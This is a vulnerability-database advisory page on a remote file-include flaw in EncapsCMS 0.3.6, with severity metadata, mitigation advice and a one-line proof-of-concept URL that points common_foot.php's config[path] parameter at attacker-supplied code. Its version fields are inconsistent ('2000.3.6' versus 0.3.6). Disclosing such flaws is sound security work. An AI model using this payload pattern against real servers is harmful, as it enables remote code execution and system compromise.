header-logo
Suggest Exploit
vendor:
EncapsCMS
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: EncapsCMS
Affected Version From: 2000.3.6
Affected Version To: 2000.3.6
Patch Exists: NO
Related CWE:
CPE: a:encapscms_project:encapscms:0.3.6
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

EncapsCMS Remote File Include Vulnerability

EncapsCMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. Additionally, input validation and sanitization should be implemented to ensure that user-supplied data is properly sanitized before being used in file inclusion operations.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22319/info

EncapsCMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects EncapsCMS 0.3.6; other versions may also be vulnerable. 

http://www.example.com/encapscms-0.3.6/common_foot.php?config[path]=evilcode?

Navigation

Suggest Exploit

Services By CQR